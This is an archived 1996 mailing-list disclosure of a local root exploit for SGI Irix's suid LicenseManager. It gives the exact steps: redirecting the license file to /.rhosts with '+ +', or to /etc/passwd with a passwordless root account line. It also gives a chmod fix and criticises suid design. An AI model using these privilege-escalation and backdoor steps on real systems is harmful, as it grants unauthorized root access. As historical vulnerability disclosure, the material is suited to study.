home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / irix_lic.asc < prev    next >
Encoding:
Text File  |  2003-06-11  |  2.4 KB  |  75 lines
  1.  
  2.                      Irix: root exploit for LicenseManager
  3.                                        
  4.    Yuri Volobuev (volobuev@t1.chem.umn.edu)
  5.    Tue, 19 Nov 1996 13:30:19 -0600
  6.    
  7. Hi there,
  8.  
  9. For your convenience, a new, fast, reliable way to get root on your local
  10. SGI is given below.  It works on Irix 5.3 and 6.x with
  11. license_eoe.sw.license_eoe installed, which I believe is default (I found it
  12. installed on several independent Irix installations).  5.2 doesn't seem to
  13. have it.
  14.  
  15. This exploit was made possible by developers who make big, fat programs like
  16. LicenseManager suid.
  17.  
  18. Short background:  LicenseManager is GUI to license subsystem.  It allows
  19. to install/remove/update FLEXlm and NET_LS licenses.  Any regular user with
  20. access to X screen can run it, and it's suid.  It will allow anyone to
  21. install licenses, and will prompt for root password if one wants to remove
  22. one.  And that's about all protection it has.
  23.  
  24. % setenv NETLS_LICENSE_FILE /.rhosts
  25. % /usr/etc/LicenseManager &
  26.  
  27. Install...
  28. NetLS Node-locked
  29. Vendor Name: whatever
  30. Vendor ID: + +
  31. Product name: whatever
  32. License version: 1.000
  33. License version:
  34. Expiration date: 01-jan-0
  35.  
  36. (in license version field I put space)
  37.  
  38. Apply
  39.  
  40. License(s) succesfully installed
  41.  
  42. % cat /.rhosts
  43. #:# "whatever" "whatever" "1.000" "Incomplete"
  44. + +
  45.  
  46. If your system has remote root logins disabled, replacing /.rhosts with
  47. /etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful.
  48.  
  49. How to fix:
  50.  
  51. chmod -s /usr/etc/LicenseManager
  52.  
  53. Comments:
  54.  
  55. This whole thing makes me feel bad.  There are genuine exploits, there are
  56. smart ones and lame ones.  This one is superlame.  Hacking suid program like
  57. LicenseManager is like stealing a milk bottle from a newborn, while baby's
  58. sleeping, parents are out of town and babysitter's in the bathroom.
  59.  
  60. It is extremely well known that suid programs are very dangerous.  It
  61. doesn't take a lot of knowledge to figure that suid program that big is
  62. vulnerable in zillion ways (and it is, I've just shown one of many).  It's
  63. just not suitable to be suid because it does no sanity checks whatsoever.
  64. So why is it suid?  Somebody wanted to make Irix GUI more user-friendly.
  65. Really, why not allow people to install licenses without bothering to su
  66. first?  Alas, this is a clear case where security is sacrified in favor of
  67. (very questionable) ease of use.  With all due disrespect, even Microsoft
  68. doesn't do things like that so easily.
  69.  
  70. I notified SGI, but haven't heard back from them.
  71.  
  72. have fun,
  73.  
  74. yuri
  75.